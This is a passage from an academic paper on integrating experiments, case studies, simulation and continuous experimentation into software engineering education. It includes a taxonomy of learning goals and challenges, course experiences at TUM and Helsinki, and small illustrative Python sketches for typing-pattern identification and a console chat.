however, replication in software engineering is considered immature and is subject to debate. juristo & gómez ( ) argue that results from current software engineering experiments are often produced by chance, are artificial, and are too far away from reality. they mention that the key experimental conditions are as yet unknown, as the tiniest change in study design may lead to inexplicable results. due to the large number of varying factors in the context of software engineering, it can be questioned whether close replication is possible at all (juristo & vegas, ). nevertheless, conducting a replication can be a valuable learning experience which develops students' ability to design studies and to critically compare the results of studies addressing the same or similar questions. although industry-based research is considered the optimal way to gather reliable and relevant data, empirical research in industry is hard; replications are even harder. for instance, as we discussed in kuhrmann ( ), small companies usually have limited resources to conduct empirical research, as it requires preparation, time, and allocation of resources. armbrust et al. ( ) mention the importance of pilot projects in the context of case study research, and discuss the difficulties of finding proper projects and allocating resources. replication increases the level of difficulty, as experiments and case studies are conducted multiple times, thus blocking critical resources for long periods of time without immediately creating value in terms of products and services. while replication in industry is hard to implement, replicated experiments and case studies are easier to realize in education, since universities provide a stable environment. deviations from the original design usually concern the subjects, while, e.g., the case, instruments, and procedures can be kept stable. thus, once a consolidated experiment design is in place, replications can be implemented on a regular basis. however, the question of whether results obtained with student subjects can be generalised to industry is then of crucial importance.

real-life examples and open source software
a major challenge for teachers is providing students with problems of considerable size. one approach is to rely on open source software (oss) projects, with many publicly available cases, problems, and code to investigate. they offer complex challenges going beyond typical local, university-driven projects. oss projects are distributed and decentralised, utilising virtual teams in which participants can range from individual volunteers to professional development teams employed by a company. furthermore, the practical relevance of oss is unquestioned, since oss projects set de facto standards for software development in certain application domains, e.g., operating systems (linux), web servers (lamp stack), and mobile ecosystems (android). participating in oss can benefit industry by leveraging development capacity for projects exceeding their own capabilities. in many cases, companies must participate in oss and build products on oss platforms in order to reach customers who are already using them. learning how to function in this context, e.g., working in a self-organising virtual team, requires particular knowledge and skills. therefore, oss projects are fruitful grounds for setting up a sophisticated teaching environment.
individual students could directly participate in a single project and investigate a specific problem, or, in order to achieve more demanding learning goals, groups of students can participate through a collaborative program (richardson, milewski & mullick, ; keenan, steele & jia, ). for instance, students from several universities can participate in a common project pool (e.g., fagerholm et al., b; fagerholm, oza & münch, ). from the industry perspective, oss projects offer increased visibility and opportunities for recruitment, contribution to added features, and sustainability of key oss components. from the teaching perspective, oss projects provide a realistic learning experience with large software systems, and allow many aspects of collaborative software development to be experienced. for researchers, oss projects have a large amount of data available, with easier access than companies' internal projects. data from oss projects has been used for several purposes, including the improvement of teaching. other data sources are also available for analysis, providing evidence-based means to improve teaching. an emerging trend is using learning analytics to support good learning outcomes, to better understand learning progress, and to construct student profiles for tailored teaching. ideally, this can allow real-time reaction to improve learning outcomes and allow larger numbers of students to participate in courses with limited teaching resources. the main benefits are, for instance, addressing the drop-out problem and providing more customised teaching for individuals. at the university of helsinki, an example of a platform allowing learning analytics is the mooc.fi online learning environment, which provides courses on cyber security, programming in several languages, web service development, and algorithms. research on the platform has, for instance, contributed methods to identify students based on typing patterns (longi et al., ), which can help prevent cheating in an online environment, and to identify students in need of assistance, which allows guidance for struggling students to be increased early on, and more challenging assignments to be provided for high-performing students (ahadi et al., ).
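longi et al.'s method is not reproduced in this paper; purely to illustrate the general idea of identifying students from typing patterns, the sketch below builds per-student profiles from inter-keystroke latencies and assigns an unlabelled typing sample to the nearest profile. the student names, timestamps, and the nearest-mean rule are assumptions for illustration, not the published approach.

```python
# illustrative typing-pattern identification: per-student profiles from
# inter-keystroke latencies, matched with a nearest-profile rule.
# all data below is synthetic.
import numpy as np

def latencies(timestamps_ms: list[float]) -> np.ndarray:
    """convert keypress timestamps into inter-key latencies (milliseconds)."""
    return np.diff(np.array(timestamps_ms))

def profile(sessions: list[list[float]]) -> np.ndarray:
    """a student's profile: mean and standard deviation of latencies."""
    lats = np.concatenate([latencies(s) for s in sessions])
    return np.array([lats.mean(), lats.std()])

def identify(sample: list[float], profiles: dict[str, np.ndarray]) -> str:
    """assign an unlabelled typing sample to the closest known profile."""
    feature = profile([sample])
    return min(profiles, key=lambda sid: np.linalg.norm(profiles[sid] - feature))

# synthetic enrolment data: two students with clearly different typing rhythms
profiles = {
    "student_a": profile([[0, 110, 230, 335, 460], [0, 120, 225, 340]]),
    "student_b": profile([[0, 70, 135, 210, 270], [0, 65, 140, 200]]),
}
print(identify([0, 115, 228, 338], profiles))  # prints "student_a"
```

real systems would use richer features (e.g., per-digraph timings) and proper classifiers, but the profile-and-match structure is the part relevant to the learning-analytics discussion above.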
a guideline for integrating empirical studies with software engineering courses
in this section, we develop an experience-based guideline for integrating empirical studies with software engineering courses. we base the guideline on experiences gathered from our own software engineering courses, categorised from several perspectives. we first generalise common purposes, challenges, and validity considerations. these serve to determine the appropriateness of a particular study in a given context. we discuss appropriateness from two perspectives: (1) teaching at universities and (2) industry training. finally, we share our experiences, discussing several aspects to be considered when integrating empirical studies with software engineering courses, e.g., motivation, scheduling, and effort.

purposes, challenges, and validity
to summarise the aforementioned kinds of empirical studies, we create the taxonomy presented in tables – . in this initial taxonomy, we include different purposes, challenges, and validity constraints to support the categorisation of study types and the analysis of appropriateness in certain contexts. we identified a total of ten purposes, describing the major learning goals associated with empirical studies in software engineering teaching that we consider important (table ). complementing the purposes, we identified eight challenges that should be taken into account when designing empirical studies for educational purposes (table ). purposes and challenges are intended to help teachers determine what study type is appropriate in a certain setting, e.g., does the actual setting allow for a (full) experiment, and if so, what challenges need to be addressed? apart from purposes and challenges, the quality of the outcomes of empirical studies, especially in the context of teaching using students as subjects (runeson, ), must be considered carefully. taking the close relation to industry and the relevance of the topics into account, we analysed the different study types for validity constraints. for example, researchers seek validity to solidify findings and to pave the way for generalisable knowledge, while industry is interested in business value. furthermore, from a teaching perspective, result validity may be considered less important than achieving the learning goals. therefore, we derived four validity considerations associated with empirical studies for teaching from the desired learning outcomes and our knowledge about the educational context (table ).

table summary of learning goals and purposes for empirical studies in education.
p1: learn to formulate a research problem. students face a (real-world) problem that needs investigation. therefore, the learning goal is to:
• capture the problem.
• formulate research questions.
• formulate hypotheses regarding users or customers and their behaviour.
due to the complexity of realistic, real-world settings, this task is demanding, e.g., formulating a problem in a scientifically sound way while keeping the (industry) partners' needs in mind.
p2: learn to collect relevant data. collecting data in realistic settings is a demanding task, as data is usually scattered across different sources. the learning goal is to develop a meaningful data collection strategy that includes data from multiple sources within a setting and is, optionally, backed up by further external data (from outside a given setting).
p3: learn to analyse real-life data. data from real-world situations is often incomplete or confidential, thus hampering data analyses. the learning goal is to develop a data analysis strategy that overcomes limited data.
p4: learn to draw conclusions. based on the collected and analysed data, the overall learning goal is to draw conclusions. thus, in the (realistic) setting, students need to learn to:
• gather empirical evidence on which conclusions are based.
• test theories and/or conventional wisdom based on evidence.
• draw conclusions from (limited) data and develop a strategy to utilise findings in practice.
the purpose is to gather findings or evidence, and to analyse the findings for relevance in the respective setting. eventually, findings must contribute to solving the original problem and, thus, another learning goal is to develop transfer strategies to support the utilisation of the findings in practice.
p5: learn to experience and solve a specific problem. a major purpose is to have people experience certain situations and develop situation-specific solution strategies or approaches.
this leads to:
• experience regarding the problem–solution relation, e.g., understanding of the relationship between user behaviour and software design.
• increased knowledge about a problem (domain).
• increased knowledge about technology and methods.
• increased knowledge about potential/feasible solutions and/or solution patterns.
the skills addressed by this learning goal are basic prerequisites that allow for developing solutions in general: these skills address a specific problem, but also allow for developing transferable knowledge that can be applied in different contexts.
p6: develop a software artefact. in software engineering, software artefacts, especially prototypes, serve the (early) analysis of a specific problem. for this, prototypes allow solution strategies to be implemented and demonstrated. the learning goal thus comprises:
• create a (software) prototype to demonstrate a solution approach/strategy (feasibility study).
• create artefacts to elaborate potential solution approaches/strategies regarding their dis-/advantages (comparative study).
• create artefacts to establish (quick) communication and feedback loops.
software artefacts in general and prototypes in particular serve the elaboration of a problem and help to understand the potential solutions. that is, such artefacts pave the way to the final solution.
p7: coaching. another learning goal is to make stakeholders familiar with new methods and tools. hence, the utilisation of the new methods/tools needs to be trained, i.e., the necessary skills need to be developed and trained.
p8: change of culture. continuous experimentation comprises a number of the other learning goals. however, continuous experimentation is more of a general organisational question than a project-specific endeavour. therefore, utilising continuous experimentation also implies a cultural change toward experimentation in the implementing organisation.
p9: learn about the impact. specific behaviour or decisions impact a system and/or a team, e.g., changing requirements or fluctuation in team composition. therefore, it is important to learn about the effects that certain behaviour and decisions have in large and/or dynamic contexts.
p10: learn about long-term effects. apparently "local" decisions might cause "global" effects. thus, it is important to know about the long-term and/or snowballing effects caused by single decisions, e.g., a shortcut in the architecture leads to increased maintenance cost (technical debt).

table summary of challenges that empirical studies in education face.
c1: finding or creating relevant cases. the major challenge is to find and define proper and relevant cases, which bears some risks:
• a case may become irrelevant while conducting a study (e.g., changing environment, changing context parameters).
• a study might go in an unexpected direction (learning curve and, in response, focus shift).
• a relevant case must be narrowed down to the participating subjects, e.g., students have different skills and goals than professionals.
cases must be balanced, e.g., learning goals must be achieved regardless of whether the original case loses its relevance (procedural over technical knowledge), or students need to finish a thesis regardless of whether industry partners can apply the study findings.
c2: no guaranteed outcome. even if a problem was found, there is no guarantee that a study will lead to an outcome.
furthermore, immediate applicability of the outcomes is not guaranteed, which means extra work for industry to transfer results into product development.
c3: time constraints. apart from the appropriateness of the actual problem, time constraints limit the study. time constraints can occur as:
• limitations dictated by the curriculum/course schedule.
• limitations dictated by industry schedules, e.g., product development cycles.
• limitations dictated by individual schedules, e.g., students who are about to finish their studies.
therefore, time constraints, together with resource limitations, define the basic parameters that affect the study objects (problem, potential/achievable solutions, completeness of results, validity of outcomes, and so forth).
c4: resource limitations. studies require resources and, thus, the availability of resources limits the study. resource limitations can occur as:
• availability of (the right) students, e.g., if a study requires students with a specific skill profile.
• motivation of students to participate in a study (personal vs. study goals).
• availability of industry resources (personnel tied to a study).
• options to adequately integrate the study with (running) company processes.
availability is an especially critical factor. for instance, while one experiment consumes resources once, repetition and replication require a long-term commitment regarding resource availability, which implies significant investments of time and/or money. in order to make resources available, participating partners need to receive a sufficient benefit, which is often hard to define in empirical studies.
c5: limited access to data. although it is one of the purposes in terms of learning goals, defining adequate hypotheses and variables that can be investigated in a course is challenging. proper measurements must be defined, taking into account that potentially not all data is available, e.g., confidential data. access to user data is especially challenging (a way out could be utilising oss projects), as this data is usually strictly confidential.
c6: built-in bias. a special problem is bias. each particular setting comes with an inherent set of biases, e.g.:
• students' special skills affect the study, and students who are trained in advance of the study affect the outcomes.
• too much or too little context knowledge on the part of the subjects affects the study.
• competing goals of the participants (especially students vs. practitioners) affect the study, e.g., students might try to optimise a study to achieve better grades while compromising the study goals.
empirical studies suffer from certain limitations, and in the context of teaching, special attention needs to be paid to bias and threats to validity.
c7: communication. empirical investigations create knowledge, data, and potentially software artefacts. therefore, results need to be quickly communicated to the participants. quick feedback helps, e.g., to determine the relevance of results and the appropriateness of the instrument, and to determine necessary adjustments. thus, fast feedback loops are necessary.
c8: creating a simulation model. for simulation-based research/teaching, setting up a simulation model is a demanding task, which consumes time and resources and thus generates cost. the entire domain under consideration must be captured to create a model that allows useful data to be generated.
table summary of validity considerations when using empirical studies in education.
v1: emphasis on meeting teaching goals. use is valid if procedural learning goals are met. the validity of conclusions and usefulness for industry are of secondary importance from the teaching perspective.
v2: emphasis on meeting business or organisational goals. validity depends on what value is created for the business. direct business value is rare; a more likely result is increased knowledge of the problem area, technology, work methods, or potential solutions or solution patterns.
v3: emphasis on creating a sound study design. the focus is on internal validity, and the results of a study are "side effects". if the learning goal is to understand experimentation itself, internal and external validity could have higher relevance.
v4: emphasis on meeting research goals. especially in simulation, the validity of the gathered data depends on the quality of the simulation model, and also on the quality of the simulation environment.

establishing context and goals, and determining a study type
we provide an initial assignment to the four major study types: experiment, case study, simulation, and continuous experimentation. individual studies are left out, since their particular challenges result from the concrete instrument applied in the respective study, e.g., an individual study may implement an experiment or a case study. table provides an initial assignment of purposes, challenges, and validity constraints from the academic perspective, while table provides the industry perspective. the tables support decision-making when selecting appropriate instruments. for instance, if the context is university, and students shall learn to solve a particular problem (p ) by developing a software tool (p ), teachers should opt for a case study. in an industry context, both case studies and experiments can be utilized. however, as table illustrates, an industry experiment is more demanding, with more challenges to address, e.g., built-in bias (c ) and communication (c ), and a different validity emphasis (v ). another observation is that no differences are suggested between the two settings in the case of the simulation instrument. in both, the major challenge is the simulation model, which affects the learning, the effort for its creation (c ), and the validity constraints (v ). concrete goals must be considered and balanced alongside contextual information when selecting a particular study type. this also includes goals going beyond classic learning goals. for instance, all stakeholders (students, teachers, and industry partners) come into contact when performing case studies in industry, which opens up several opportunities. students make contact with industry and could find a job. students team up with other students to create an idea, which may eventually lead to the founding of a company. on the other hand, industry can conduct research cheaply, as they usually pay with time spent, sponsor an idea, or pay a small fee to keep a software engineering lab running. in either case, industry gets access to the latest knowledge and fresh resources. finally, researchers have the opportunity to conduct some research (given the limitations mentioned above).
table education in academia/university: initial assignment of purposes, challenges, and validity emphases to the study types experiment, case study, continuous experimentation, and simulation.

table education in industry: initial assignment of purposes, challenges, and validity emphases to the study types experiment, case study, continuous experimentation, and simulation.

motivating students to conduct empirical studies
making contact with industry, and the prospect of finding a job or starting a company, fosters students' motivation to actively participate in courses, and may contribute to higher motivation, engagement, and a better understanding of course contents. for instance, in kuhrmann, fernández & münch ( ), we reported on a new teaching format applied to a software process modelling course, including an empirical study. the course evaluation showed that students experienced the course significantly better than the class before (without the study), although they perceived the course as more demanding (see 'example : a course on software process modelling with and without experiments'). the evaluation showed that students understood the contents and their relevance better, gathered advanced knowledge, and learned to apply it by experiencing practical effects, e.g., the consequences of wrong design decisions. our experience also shows that encouraging students to develop ideas and create products boosts motivation (cf. brügge, krusche & alperowitz, ). for instance, smartphone apps can be developed in collaboration with industry partners and published in an app store. gaining visibility, real clients, real feedback, and real bug reports guides students through the whole software development and product life cycle. nevertheless, apart from all potentially positive motivating drivers, a major driver for students is to get the best possible grade. also, the number of credits must reflect the effort required to conduct the study. for students, the amount of time required to receive a credit point is an important consideration. since empirical studies are demanding in terms of effort, and credits form the compensation, software engineering courses that include empirical studies must adequately "remunerate" the students for their efforts.

scheduling
having defined the goals and acquired (motivated) students and, optionally, partners from industry, the challenges c and c (table ) must be addressed. planning empirical studies in a standard university curriculum is demanding, as students usually take several courses and thus have limited resources. furthermore, courses often span – weeks and, if industry is involved, their schedules must be respected as well. in kuhrmann ( ), we provided a generic template that integrates classic teaching with explicit workshop slots, which can be used to conduct empirical studies. in kuhrmann, fernández & münch ( ) and kuhrmann, femmer & eckhardt ( ), we provided concrete instances and reported on the feasibility of the proposed template. however, conducting empirical studies in collaboration with industry requires refining the generic template. we consider three basic planning patterns appropriate:
• workshop model: in the workshop model, teachers, students, and practitioners conduct a workshop in which they collaboratively work on a problem.
an example is a lab-based environment, such as the software factory (fagerholm, oza & münch, ). moreover, the workshop model is quite common in industry training (usually – days); a study that fits that schedule is more likely to be accepted by industry partners.
• interleaved model: the interleaved model allows a "long-running" study to be conducted. normal work slots alternate with workshop slots, e.g., a new method is deployed and trained, practitioners apply it, researchers evaluate, improve and/or train new aspects of it, practitioners continue application, and so forth. furthermore, this model proved beneficial when supervising students conducting individual studies in industry. there are several benefits: regular work is not disturbed over a long period; training can be done iteratively; and cases can be observed over a longer time period. however, course schedules limit the applicability with student groups.
• observation model: this model is the classic research model adapted for educational purposes. students or practitioners are instructed, work independently on a task, and get coaching from teachers. besides the coaching, teachers monitor the correct application of empirical methods to collect and analyse data.
planning the study and reconciling the study plan with all time constraints needs to be done carefully, and requires the commitment of all participants to ensure the availability of personnel and resources.

further study type selection criteria
apart from the criteria already discussed, we wish to highlight some further criteria that may influence the selection of study types for educational purposes. first, in table , we summarize well-known criteria from the literature (e.g., wohlin et al., ) and further criteria that we consider relevant for study type selection. the table includes an experience-based rating for the criteria. however, this rating has to be considered a subjective recommendation, as it is hard to precisely define, e.g., the degree of motivation or student satisfaction. we note that the knowledge and skill level of students should also be taken into account when selecting and tailoring an empirical instrument for teaching. in table , we provide an experience-based assessment of how different study types can be adjusted for different levels of students. two student levels are considered: bachelor's ( – years of study) and master's ( – years of study). in industry, these may be interpreted either based on employees' level of education or on their working experience in the field. the primary means of adjustment is the selection of a suitable problem scope and setting expectations for an appropriate result scope.

table further study selection criteria for different study types. each study type is ranked relative to the others on three levels and may span more than one level (lo: low; me: medium; hi: high). the rated criteria are: degree of execution control, degree of measurement control, degree of validity, motivation to participate in a study, motivation created by the study, student satisfaction, scheduling effort, ease of goal definition, and effort to prepare/conduct a study.
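the lo/me/hi marks of the original table do not survive the flattened layout above, so the sketch below uses placeholder ratings only; it is meant to show how such a criteria matrix could be encoded and queried when shortlisting study types for a course, not to restate the table's actual ratings. the criterion and study-type names follow the table, the values are hypothetical.

```python
# hypothetical encoding of study-type ratings; the values are placeholders,
# not the ratings from the paper's table.
RATINGS: dict[str, dict[str, str]] = {  # study type -> criterion -> "lo" | "me" | "hi"
    "experiment": {"degree of execution control": "hi", "scheduling effort": "me"},
    "case study": {"degree of execution control": "lo", "scheduling effort": "hi"},
    "simulation": {"degree of execution control": "hi", "scheduling effort": "lo"},
}

def matching_study_types(criterion: str, wanted: str) -> list[str]:
    """return the study types whose rating for a criterion equals the preference."""
    return [s for s, crit in RATINGS.items() if crit.get(criterion) == wanted]

print(matching_study_types("degree of execution control", "hi"))  # ['experiment', 'simulation']
```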
table adjusting study types to student levels. length of study is indicative and based here on european standards.
• experiment. bachelor's level: simple experiments with few variables; experiment design given. master's level: more complex, multivariate experiments; own experiment design.
• case study. bachelor's level: limited topics, restricted to a chosen context, few informants; little or no generalisation; exploratory, descriptive, or intrinsic case studies. master's level: topics related to well-specified software engineering areas; some generalisation, with the limitations of generalisation fully analysed; all case study types.
• continuous experimentation. bachelor's level: rudimentary practice with synthetic scenarios; focus on understanding basic steps such as identifying assumptions, creating hypotheses, and collecting data. master's level: more advanced scenarios or limited real-life experiments; focus on drawing conclusions from data and understanding limitations.
• simulation. bachelor's level: using ready-made simulation models and given data to explore topics through simulation. master's level: exploring the effect of changes in models using given data, or how ready-made models behave with student-collected data; some exploration with creating simulation models.
• individual studies. bachelor's level: focus on finding and summarising existing research. master's level: focus on answering specific research problems by applying existing research and own data collection; no requirement of scientifically novel results.

for example, case studies at the bachelor's level can be more limited in scope and focus on exploratory, descriptive, or intrinsic designs without much generalisation beyond the case environments. at the master's level, some generalisation can be expected, although still limited, and an assessment of the possibilities to generalise can be expected at this level. this assessment must be considered a subjective starting point for adjustment, as students are different and educators should, as far as possible, tailor courses for individuals in order to provide the best opportunities for learning.

experiences
in this section, we provide some experiences gathered from implementing empirical instruments in university teaching. we provide selected examples, outline the respective courses (purpose, approach, outcomes), and provide feedback and evaluation (formal as well as informal) to reflect the students' perception of these courses.

example : a course on software process modelling with and without experiments
a course on software process modelling, which implements the curriculum presented in kuhrmann, fernández & münch ( ), serves as the first example. the course was offered multiple times at the technische universität münchen (tum) and the university of helsinki. in munich, after the initial run, the course was reorganized according to the concept presented in kuhrmann ( ), in which we presented an approach to integrate experimentation with practical software engineering courses. due to the reorganization, students experienced the (abstract) topics while conducting a controlled experiment, on which we reported in kuhrmann, fernandez & knapp ( ). moreover, due to the repeated execution, in which we applied a course structure both without and with empirical instruments, we can present a number of experiences and a comparison.
formal evaluation
in table , we present the comparison based on the formal course evaluations conducted by the faculty of informatics at tum. due to updated questionnaires, the evaluations are not directly comparable; however, the basic information can still be extracted. (since we informed the students about the "experimental" character of this special course in advance, the students did not complain, but welcomed the opportunity to give feedback to improve their own class.)

table formal evaluation (anonymous questionnaire, comparison winter / and / , tum). result interpretation: ↑, large improvement; ↗, small improvement; →, no change; ↘, small deterioration; ↓, large deterioration. note that smaller scores are better. the evaluated criteria were the number of completed questionnaires, the common criteria ( = very high, = very low) complexity (↑), volume (↑), speed (→), and appropriateness of effort compared to ects points (n.a.), and the overall ratings ( = very good, = very bad) for the lecture (↘), the exercise (↑), and the relation to practice.

the formal evaluation shows a significant increase of the scores regarding exercise quality and relation to practice, although, at the same time, the students also see the lecture as more demanding. since the basic course contents did not change, we interpret this evaluation as an increased awareness toward the course topic, which might be caused by the stronger utilization of practical aspects through the experiment. we see this as an indication that introducing experiments could have a positive effect, although a full validation is missing.

informal evaluation
besides the formal faculty-driven evaluation, we also performed two informal feedback rounds in the course instance in which we adopted the empirical instruments. we asked the students to write a one-minute paper that contained the following three questions, to be answered in a few words:
1. (up to ) points that are positive
2. (up to ) points that are negative
3. (up to ) points that i still wanted to say (informal)
table shows the summarized results from the informal evaluation: the structure of the class, the selected topics, the combination of theory and practice, and the way of continuously evaluating the work and determining the final grades were rated positively. especially the practical projects and the team work in the workshops were highlighted. on the other hand, students mentioned the tough schedule and the not always optimal tailoring of tasks for the practical sessions.
table summarized evaluation of the one-minute papers (winter / , tum).
• positive aspects: structure of the topics and the class, combination of theory and practice, projects in teams (atmosphere), self-motivation due to presentations, continuous evaluation and determination of the final grades.
• negative aspects: tough schedule; tailoring of the tasks for the practical sessions was not always optimal; students signed off just because of the examination procedure.
• informal: "thank you, this was the lecture i learned the most." "super class, and i loved those many samples from practice."

example : a course on agile project management and software development with experiments
the second example is an advanced course on agile software project management, which is also grounded in the general course pattern presented in kuhrmann ( ). a detailed description of the course and the data obtained from the experiments is provided in kuhrmann, femmer & eckhardt ( ). in this course, offered at the technische universität münchen, the main purpose of the experiment instrument was to create awareness; scientific results were not the objective. we implemented two experiments:

experiment (group dynamics)
the first experiment aimed at demonstrating how groups of people collaborate in teams under stress (kuhrmann & münch, b). therefore, we introduced the tuckman model (tuckman, ), which describes group formation processes, and designed a simple experiment in which the students had to sort sweets and document the outcomes. during the different experiment runs, we put some pressure on the students, e.g., increasing task complexity, enforced turnover, and external disturbances. although this experiment did not aim at finding new scientific revelations, we could confirm the tuckman model and show that group performance suffers from turnover.

experiment (distributed development)
the second experiment was designed to give the students the opportunity to deal with hopeless situations (kuhrmann & münch, a): we designed a software engineering "kobayashi maru" test (in the star trek franchise, kobayashi maru is a leadership test with a no-win scenario; see https://en.wikipedia.org/wiki/kobayashi_maru). students were separated into two sets, each consisting of two groups, for a total of four groups. each group had to develop a very simple console-based chat application (requirements in the form of user stories and test cases were provided), the groups were separated (each was located in a separate room), and each group was allowed to use only one communication channel (e-mail and skype, respectively). after the task had been presented to them, the groups were immediately separated to avoid any direct communication, and for each group, a researcher monitored compliance with the experiment rules.
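the starter material handed to the groups (user stories and test cases) is not included in the paper; purely to illustrate the intended scale of the task, here is a hypothetical minimal console chat over a single tcp connection. it is not the course's actual code, and the command-line interface is an assumption.

```python
# hypothetical minimal console chat: one peer runs as server, the other connects;
# each side forwards stdin lines to the peer and prints lines received.
import socket
import sys
import threading

def print_incoming(conn: socket.socket) -> None:
    """print every line the other side sends."""
    for line in conn.makefile("r", encoding="utf-8"):
        print(f"peer> {line.rstrip()}")

def chat(conn: socket.socket) -> None:
    threading.Thread(target=print_incoming, args=(conn,), daemon=True).start()
    for line in sys.stdin:                       # forward local input to the peer
        conn.sendall(line.encode("utf-8"))

if __name__ == "__main__":
    if sys.argv[1] == "serve":                   # usage: python chat.py serve 5000
        server = socket.create_server(("", int(sys.argv[2])))
        connection, _ = server.accept()
    else:                                        # usage: python chat.py <host> <port>
        connection = socket.create_connection((sys.argv[1], int(sys.argv[2])))
    chat(connection)
```

even a sketch of this size makes the point of the exercise visible: without an agreed message format and a negotiated protocol between the separated groups, individually working clients do not add up to a working system.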
great exercises.’’ ‘‘interactive, student presentations, experiments.’’ ‘‘applicability of the course immediately in my work for other software projects.’’ did not have the chance to initially find some agreements, the projects were failures-by- design. the students immediately started to work (they had only min to develop the working software), yet, nobody came up with the idea to negotiate a communication protocol first. therefore, after the deadline, no group could show any working software. in a closing feedback session, we revealed the nature of the experiment and discussed the observations. formal evaluation in table , we present the comparison based on the formal course evaluations conducted by the faculty of informatics. although we have only one evaluated instance of this course, we use the same structure as in table to present the data. the evaluation shows this course to be on approximately the same level as the improved software process modelling course. informal evaluation besides the formal faculty-driven evaluation, we again performed two informal feedback rounds in the course. we asked the students to write a one-minute-paper (see above). since the outcomes are actually the same as already presented in table , we only present the informal comments (third question) in table . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. example : master’s theses using a case study approach master’s theses provide opportunities for individual students to apply a specific research approach to a chosen problem. the third example comes from a selection of master’s thesis projects which we have supervised at the university of helsinki, all of which use a case study approach. they are therefore examples of both individual studies and case studies. the first thesis project investigated a software prototype game and applied usability and user experience evaluation methods to determine whether it fulfilled two sets of criteria: the entertainment value of the game, and the ability to tag photos as a side effect of playing the game. the game itself was implemented by a student team in cooperation with a company, and the thesis writer was part of the implementation team. in this thesis, the game constituted the case and four sources of evidence were used: user interviews, in-game data collection, a questionnaire, and observations from a think-aloud playing session. the thesis can be characterised as an intrinsic case study (stake, ; baxter & jack, ), since the objective was not to gain understanding of an abstract construct or general phenomenon, nor to build a theory. rather, the case itself was of interest, and the results were suitable for making further decisions regarding development of a full game based on the prototype. the second thesis project investigated continuous delivery and continuous experimentation in the b b domain. the objective was to analyse challenges, benefits, and organisational aspects in a concrete company case. the thesis writer was an employee in the company and was thus a participant observer. in this thesis, the case consisted of the development process used by two teams for two separate software products. two sources of evidence were used: participant observation and interviews with team members, six in each of the two teams. 
the thesis can be characterised as an exploratory deductive case study, where the aim was to explore how continuous delivery and continuous experimentation could be applied in the company and what challenges and success factors are encountered. the thesis aimed to generalise and provide results that could be adapted to other b b companies. the third thesis project investigated the state of the practice of experiment-driven software product and service development. the objective was to understand the state of the practice of continuous experimentation and to identify key challenges and success factors in adopting continuous experimentation. the thesis can be characterised as a qualitative survey design, which resembles a case study but relies on a single source of evidence. in that sense, the thesis was close to an intrinsic case study, as it aimed to develop a multifaceted understanding of the topic rather than develop theory. the thesis used material from interviews in software companies. the result of the thesis was a rich picture of the state of the art concerning experiment-driven software development in the case companies. although the primary aim was not to generalise, the results were relevant as comparison points in other companies. informal evaluation utilising a case study approach in the masters’ theses provided the opportunity to investigate highly relevant problems in their natural context. each thesis gained from fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. having an industrial connection which provided real-life constraints, questions, and data. in each thesis, the student had to consider the setting, objectives, questions, methods, data collection, and analysis procedures and adjust the general case study research method to their particular implementation. we observed high motivation among the students, timely completion of subtasks and of the thesis as a whole, and clear maturation with a complex individual project. two of the theses were developed into scientific papers that have been published in peer-reviewed forums. based on these examples, the difficulties related to case studies can be summarised into three categories. first, finding and scoping a relevant research problem can be difficult for many students, as they do not have the necessary overview of the present literature that is needed. the role of the advisor is of prime importance in the beginning: helping to formulate the research questions and pinpoint what the case or unit of analysis is. second, understanding case study research as a method can take a long time without proper guidance. providing relevant method literature, identifying the key concepts, and providing an understanding of how to implement the method in practice —designing the study—are areas where the advisor can help. the data collection is usually interesting and straightforward, perhaps with some practical challenges related to finding data sources. as these can often be overcome by some persistence, the third category is related to performing the analysis and writing up the case report or thesis. students do not often have a chance to practice these skills on a regular basis, and thus there are many questions regarding analysis choices and patterns for writing up results that an advisor may be able to help with. although we rely here only on informal evaluation, these examples have convinced us that case studies of different types are well suited as teaching tools. 
they require a wide range of skills which the students must acquire, and these skills are applicable in many other settings as well. perhaps the most important insight to be gained from conducting case studies is that students are faced with a wide variety of data that challenge their preconceptions and develop their ability to observe phenomena in their real-life context. discussion implementing a course using empirical instruments provided us with a number of insights. related to the scientific and organizational perspective, we learned that course preparation causes more effort compared to classic teaching. first, the examples and cases to be used in experiments need to be tailored accordingly: there must be time restrictions due to schedule requirements. this has two major impacts. first, the investigated topic is of reduced complexity, which causes it to be less realistic. second, research questions must be carefully selected for reasonable treatment within time constraints. therefore, we consider explorative (curiosity-driven) or confirmative experiments meaningful, i.e., experiments of low criticality. from the teaching perspective, we experienced that the choice of a real world example rather than an artificial toy example has proved to be successful. for example, the experiment outcome from kuhrmann, fernandez & knapp ( ) was a fully implemented process to which the process owner stated that he did not expect the student groups to create fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘such a comprehensive solution in this little time.’’ another goal—‘‘let students experience the consequences of their decisions’’—was also achieved. for instance, in the course on software process modelling, while implementing the process in a workshop session, we could observe a certain learning curve. one team had a complete design, but selected an inappropriate modelling concept. later, the team had to refactor the implementation, which was an annoying and time-consuming task, both increasing their awareness of the consequences of certain design decisions. furthermore, students also experienced how difficult it is to transform informal information or tacit knowledge into process models. the students could also see how difficult it is for individuals to formulate their behaviour in a rule-oriented manner. for the course on software process modelling in munich, we compared the final grades of both courses and recognized significantly better grades in the second run. during course exams, the students could not only answer all (theoretical) knowledge-related questions, but also all knowledge-transfer and application-related questions. the students usually referred to the practical examples and were able to transfer and apply their experiences to new situations. finally, the case study-based master’s theses allowed our students to be embedded in projects with real-life connections. apart from their educational value for the students, they contributed to the scientific literature and helped students in their early careers. although our industry connections were important in obtaining the cases, the students themselves learned to be self-directed in their work and gained significant domain knowledge. as thesis supervisors, we found that there was some additional effort in introducing case study methodology to students—methodology courses do not fully prepare students to actually carry out a study of their own, which is to be expected. 
however, being embedded in the project and receiving feedback from the project environment and its stakeholders meant that it was easy to convince students of the necessity of a structured approach. once students were up to speed, the extra supervision effort was compensated by more autonomous work on the students' part.

limitations
